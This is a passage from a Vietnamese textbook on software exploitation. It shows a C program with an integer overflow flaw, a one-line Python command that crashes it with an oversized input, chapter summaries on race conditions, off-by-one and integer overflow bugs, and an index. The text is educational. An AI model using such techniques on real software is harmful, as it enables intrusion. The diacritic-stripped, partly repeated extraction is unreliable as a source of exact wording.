9 char buf [ SIZE ] ;
10 short l en ;
11 i f ( argc < 2)
12 {
13 return 0;
14 }
15 l en = at oi ( argv [ 1 ] ) ;
16 i f ( l en > SIZE)
17 {
18 return 0;
19 }
20 puts ( "Input a s t r i ng " ) ;
21 f g e t s ( buf , ( l en & 0xFFFF) , s t di n ) ;
22 return 0;
23 }
Ngun 5.4: int_overflow.c
trn b m. Li trn b m c bn n trong Chng 3 nn chng ta
s b qua phn tn dng li ny m ch tp trung vo cch p hm fgets nhn
nhiu d liu hn.
regular@exploitation:~/src$ python -c print "a" * 65535 | ./int_overflow 65535
Input a string
Segmentation fault
5.4 Tm tt v ghi nh
Li trng hp ua xy ra khi hai hoc nhiu tin trnh, hoc tiu trnh
ca cng mt tin trnh, truy cp vo cng mt ti nguyn m kt qu
ca vic truy cp ny ph thuc vo th t truy cp ca cc tin trnh,
hay tiu trnh.
Ngoi ni dung v cch nhp d liu, thi im nhp d liu vo chng
trnh cng l mt trong ba vn quan trng trong vic tn dng li.
Li trng hp ua thng gp trong cc chng trnh x l tp tin hoc
kt ni ti c s d liu v cc ti nguyn ny c dng chung bi nhiu
tin trnh hay tiu trnh.
Cch khc phc li trng hp ua thng thng nht l s dng kha
hoc c hiu tun t ha vic truy cp ti nguyn.
Li d mt l trng hp ring ca li trn b m trong ch mt k
t b trn.
Chng trnh c th b vng li an ninh mt ni nhng ch tht s b
tn dng ti mt v tr khc.
Li trn s nguyn xy ra khi mt tc v s hc to nn mt gi tr s
nm ngoi khong c th biu din c bi kiu d liu.
Li trn s nguyn c th do di ca kiu d liu khng ph hp nh
vic gn mt gi tr kiu int vo kiu ngn hn nh short hay char, hay
khi cng 1 vo mt byte mang gi tr FF s b quay vng v 00, cng c
th do s khc bit ca kiu c du v khng du v d nh nu cng 1
vo gi tr dng 7F ca mt bin kiu char th bin ny s mang gi tr
m, v cng c th b gy ra do s bt i xng gia s gi tr m v s
gi tr dng ca kiu c du v d nh ly s i ca -128 thp phn s
c chnh -128 thp phn i vi kiu char.
Chng 6
Tm tt
Ti y, chng ta kt thc bn phn chnh ca ti liu ny. Bn c c
gii thiu v cu trc my tnh, bt u t cc h c s ri chuyn qua b vi
x l, b nh, ngn xp, cc lnh my, hp ng v phng php mt trnh bin
dch chuyn m t ngn ng cp cao sang ngn ng cp thp.
Chng ta kho st loi li trn b m, thc hin tn dng li
thit lp gi tr ca mt bin ni b, bit n nhng cch chuyn dng b nhp
chun, thay i lung thc thi ca chng trnh, quay tr v th vin chun,
v ni kt nhiu ln quay v th vin chun vi nhau.
Khi bn v li chui nh dng, chng ta xem xt v nguyn tc hot
ng ca chui nh dng, cc yu cu nh dng thng thng, cch s dng
chng qut ngn xp, ghi mt gi tr bt k vo mt vng nh bt k, cc
cch ct mt gi tr ln thnh nhiu phn tin cho vic ghi, v p dng k
thut vo vic tn dng li thng qua danh sch hm hy trong phn vng
.dtors, cc phn t trong bng GOT.
Ngoi hai loi li ph bin trn, chng ta cn xem xt qua ba li nghim
trng khc. Chng ta kho st trng hp ua gia cc tin trnh v tiu
trnh khi truy cp vo cng mt ti nguyn lm nh hng n tnh an ton
ca chng trnh nh th no. Sau chng ta xem qua mt trng hp c
bit ca li trn b m trong ch mt byte b trn. V cui cng chng ta
bn v li xy ra khi gi tr vt qu min biu din c ca kiu d liu.
Cng vic nghin cu an ninh ng dng i hi mt kin thc nn tng vng
vng v tng qut. Tc gi hy vng rng ti liu ny em n cho c gi
mt phn nh trong kho kin thc khng l y, ch r nhng php mu trong
cc k thut tn dng li.
Chc c gi nhiu nim vui trong nghin cu.
'
&
$
%
Dng c v suy ngh
c gi c th t h thng ha li nhng g bn khng?
Cho tm bit.
105
Ch mc
$, 23
B
b np, 45
B nh, 17
b nhp chun, 37
b xut chun, 38
bng a ch ton cc, 92
bin cc b, 21
Bin mi trng, 53
bin ni b, 27
bin t ng, 27
C
c hiu, 99
carriage return, 13
Central Processing Unit, 13
Chng trnh g ri, 48
chui nh dng, 73
Chuyn hng, 41
con tr lnh, 13
con tr ngn xp, 21
con tr vng nh, 30
CPU, 13
D
D mt, 99
danh sch hm hy, 90
di con tr v u dng, 13
dng mi, 13
E
epilog, 27
G
G ri, 48
H
H nh phn, 11
H thp lc phn, 11
H thp phn, 11
hm gi, 27
hm hy, 89
hp ng, 20
I
i s, 29
a ch tuyn tnh, 17
K
kha, 99
khong trng, 13
kt thc chui, 13
kt thc nh, 18
L
li phn on, 68
lin kt mm, 65
line feed, 13
Lung thc thi, 45
M
m lnh, 16
m my, 18
N
new line, 13
ng, 41
ng truyn d liu, 17
ng truyn a ch, 17
ngn xp, 21
ngu nhin ha dn tri khng gian cp
cao, 54
NUL, 13
O
ngn xp, 21
P
phn vng trao i, 17
phn x l tn hiu, 68
prolog, 27
106
CH MC 107
Q
qun l b nh o, 17
quay v phn vng .text, 51
quay v th vin chun, 65
quy c gi hm, 93
S
shellcode, 16
T
Thanh ghi, 16
thi im kim tra/thi im s dng,
95
tin trnh, 52
tiu trnh, 98
Tp lnh, 18
trn s nguyn, 101
Trng hp ua, 95
tun t ha, 99
V
vo sau ra trc, 21
vi x l, 13
v, 61
vng nh, 27
vng nh ngn xp, 30
X
xung dng, 13

Nghe Thuat Tan Dung Loi Phan Mem

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Nghe Thuat Tan Dung Loi Phan Mem

Uploaded by

Copyright:

Available Formats

Ngh thut tn dng li phn mm

Nguyn Thnh Nam

20 CHNG 2. MY TNH V BIN DCH

Dng c v suy ngh

Dng c v suy ngh

Dng c v suy ngh

Dng c v suy ngh

Dng c v suy ngh

Dng c v suy ngh

Dng c v suy ngh

Dng c v suy ngh

Dng c v suy ngh

Dng c v suy ngh

Dng c v suy ngh

You might also like